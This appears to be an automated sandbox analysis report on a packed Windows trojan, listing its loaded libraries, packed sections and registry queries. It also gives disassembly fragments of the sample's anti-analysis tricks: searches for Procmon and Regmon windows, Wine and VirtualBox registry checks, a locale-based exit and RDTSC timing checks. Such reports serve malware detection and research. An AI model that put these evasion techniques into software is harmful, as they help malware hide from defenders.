              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01122EB90_2_01122EB9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111A6AB0_2_0111A6AB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011326F30_2_011326F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D0EEE0_2_010D0EEE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A4EF70_2_010A4EF7
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00D64A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: agjwaxpt ZLIB complexity 0.9946596130425155
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D83A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00D83A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00D7CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3S9OMQP6.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1840128 > 1048576
              Source: file.exeStatic PE information: Raw size of agjwaxpt is bigger than: 0x100000 < 0x1a7600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agjwaxpt:EW;qyczlbbe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agjwaxpt:EW;qyczlbbe:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D86390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cfae2 should be: 0x1c4b36
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: agjwaxpt
              Source: file.exeStatic PE information: section name: qyczlbbe
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A811C push 24D5C7F9h; mov dword ptr [esp], ebx0_2_011A8124
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A811C push 5BB20B2Ch; mov dword ptr [esp], ebp0_2_011A81DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115511D push edx; mov dword ptr [esp], eax0_2_01155127
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C8907 push edi; mov dword ptr [esp], ebx0_2_011C8971
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D87895 push ecx; ret 0_2_00D878A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114896A push ecx; mov dword ptr [esp], ebx0_2_011489AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B11B8 push edx; mov dword ptr [esp], eax0_2_011B12C7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 4C0B2887h; mov dword ptr [esp], ecx0_2_0111C1DE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push edx; mov dword ptr [esp], edi0_2_0111C1EB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 59790D35h; mov dword ptr [esp], esi0_2_0111C2C4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push ecx; mov dword ptr [esp], 01A45607h0_2_0111C2ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 0C536226h; mov dword ptr [esp], edx0_2_0111C33D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push esi; mov dword ptr [esp], ecx0_2_0111C3BF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 18BA945Bh; mov dword ptr [esp], edi0_2_0111C3D3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push esi; mov dword ptr [esp], ebp0_2_0111C3DD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 67468500h; mov dword ptr [esp], ebp0_2_0111C405
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 465709B6h; mov dword ptr [esp], ecx0_2_0111C418
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push ecx; mov dword ptr [esp], eax0_2_0111C51C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push esi; mov dword ptr [esp], eax0_2_0111C53C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push esi; mov dword ptr [esp], edx0_2_0111C540
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push eax; mov dword ptr [esp], 3C4A3027h0_2_0111C566
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push ecx; mov dword ptr [esp], eax0_2_0111C5B8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push ebx; mov dword ptr [esp], eax0_2_0111C659
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push eax; mov dword ptr [esp], esi0_2_0111C6B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 1F9DAFD4h; mov dword ptr [esp], eax0_2_0111C6B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push eax; mov dword ptr [esp], ecx0_2_0111C725
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push eax; mov dword ptr [esp], 0CBBE800h0_2_0111C77B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push edx; mov dword ptr [esp], esi0_2_0111C7D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push edi; mov dword ptr [esp], 3C103176h0_2_0111C800
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 0B218B78h; mov dword ptr [esp], edx0_2_0111C82C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE push 04F5874Bh; mov dword ptr [esp], ecx0_2_0111C972
              Source: file.exeStatic PE information: section name: agjwaxpt entropy: 7.953344227799623

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D86390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25674
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFB03 second address: FAFB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131C66 second address: 1131C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131F39 second address: 1131F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134C57 second address: 1134CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a xor dword ptr [esp], 7DD42484h 0x00000011 mov si, 47EFh 0x00000015 push 00000003h 0x00000017 mov di, FCE7h 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+122D1C66h], ebx 0x00000023 push 00000003h 0x00000025 push B24FA1E6h 0x0000002a jmp 00007FB8DCDE9E43h 0x0000002f add dword ptr [esp], 0DB05E1Ah 0x00000036 jmp 00007FB8DCDE9E3Bh 0x0000003b sub dword ptr [ebp+122D3468h], edi 0x00000041 lea ebx, dword ptr [ebp+12458AA9h] 0x00000047 mov ecx, edi 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FB8DCDE9E42h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134CDD second address: 1134CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134D8F second address: 1134E62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dx, B020h 0x0000000e mov edi, 415EF4B7h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FB8DCDE9E38h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D366Ch], ebx 0x00000035 push 9431FF4Dh 0x0000003a pushad 0x0000003b jc 00007FB8DCDE9E3Ch 0x00000041 jmp 00007FB8DCDE9E45h 0x00000046 popad 0x00000047 add dword ptr [esp], 6BCE0133h 0x0000004e push 00000003h 0x00000050 mov edi, dword ptr [ebp+122D3675h] 0x00000056 push 00000000h 0x00000058 push 00000003h 0x0000005a call 00007FB8DCDE9E39h 0x0000005f jno 00007FB8DCDE9E5Eh 0x00000065 push eax 0x00000066 jnl 00007FB8DCDE9E3Eh 0x0000006c mov eax, dword ptr [esp+04h] 0x00000070 pushad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134E62 second address: 1134EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB8DCE20296h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 jl 00007FB8DCE2029Eh 0x0000001a push eax 0x0000001b jne 00007FB8DCE20296h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jnc 00007FB8DCE202AFh 0x0000002c pushad 0x0000002d jmp 00007FB8DCE202A1h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134FD2 second address: 1134FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134FD6 second address: 1135085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 65F139FFh 0x00000011 sub dword ptr [ebp+122D182Dh], edi 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b mov dl, E8h 0x0000001d or dword ptr [ebp+122D1BD6h], edx 0x00000023 push 00000003h 0x00000025 pushad 0x00000026 push eax 0x00000027 mov edx, 0EE7A0C6h 0x0000002c pop edi 0x0000002d mov ebx, 2F1F4E00h 0x00000032 popad 0x00000033 call 00007FB8DCE20299h 0x00000038 pushad 0x00000039 push eax 0x0000003a ja 00007FB8DCE20296h 0x00000040 pop eax 0x00000041 jmp 00007FB8DCE2029Ah 0x00000046 popad 0x00000047 push eax 0x00000048 push esi 0x00000049 pushad 0x0000004a jmp 00007FB8DCE202A8h 0x0000004f jng 00007FB8DCE20296h 0x00000055 popad 0x00000056 pop esi 0x00000057 mov eax, dword ptr [esp+04h] 0x0000005b jmp 00007FB8DCE202A8h 0x00000060 mov eax, dword ptr [eax] 0x00000062 push esi 0x00000063 je 00007FB8DCE2029Ch 0x00000069 jg 00007FB8DCE20296h 0x0000006f pop esi 0x00000070 mov dword ptr [esp+04h], eax 0x00000074 pushad 0x00000075 push edi 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135085 second address: 11350C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB8DCDE9E40h 0x0000000a popad 0x0000000b pop eax 0x0000000c mov ecx, 77B514CFh 0x00000011 mov edx, ebx 0x00000013 lea ebx, dword ptr [ebp+12458ABDh] 0x00000019 mov ecx, dword ptr [ebp+122D36A5h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edi 0x00000024 pop edi 0x00000025 jmp 00007FB8DCDE9E3Ah 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11350C0 second address: 11350C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115521A second address: 1155220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155220 second address: 1155226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155226 second address: 1155235 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8DCDE9E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C964 second address: 112C968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C968 second address: 112C99D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8DCDE9E3Eh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB8DCDE9E43h 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FB8DCDE9E36h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C99D second address: 112C9A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C9A6 second address: 112C9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C9AC second address: 112C9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115309E second address: 11530C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007FB8DCDE9E36h 0x0000000b jnl 00007FB8DCDE9E36h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB8DCDE9E3Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1153351 second address: 1153390 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCE20296h 0x00000008 jp 00007FB8DCE20296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FB8DCE2029Dh 0x00000015 js 00007FB8DCE20298h 0x0000001b pushad 0x0000001c popad 0x0000001d ja 00007FB8DCE20298h 0x00000023 popad 0x00000024 jp 00007FB8DCE202B3h 0x0000002a pushad 0x0000002b push edi 0x0000002c pop edi 0x0000002d push esi 0x0000002e pop esi 0x0000002f push esi 0x00000030 pop esi 0x00000031 popad 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11534C8 second address: 11534D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11537F3 second address: 11537F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11537F7 second address: 1153819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FB8DCDE9E3Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115398A second address: 1153998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCE2029Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F214 second address: 111F218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F218 second address: 111F23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FB8DCE2029Eh 0x00000013 popad 0x00000014 jng 00007FB8DCE202B4h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F23F second address: 111F245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F245 second address: 111F249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154AD6 second address: 1154ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154ADA second address: 1154AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127883 second address: 1127889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127889 second address: 11278A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB8DCE202A3h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11278A7 second address: 11278F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB8DCDE9E3Ch 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FB8DCDE9E3Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB8DCDE9E44h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11278F3 second address: 11278F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11278F9 second address: 11278FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115DCD4 second address: 115DCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11608CC second address: 11608EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8DCDE9E3Bh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB8DCDE9E3Ch 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160A56 second address: 1160A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCE2029Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160E64 second address: 1160E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160E6D second address: 1160E75 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161023 second address: 116102D instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8DCDE9E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116102D second address: 1161061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FB8DCE20296h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FB8DCE202A6h 0x00000016 popad 0x00000017 jmp 00007FB8DCE2029Ch 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164527 second address: 116452C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116452C second address: 1164554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB8DCE202A2h 0x0000000e jg 00007FB8DCE2029Ch 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007FB8DCE2029Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164554 second address: 1164558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11651DD second address: 11651EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
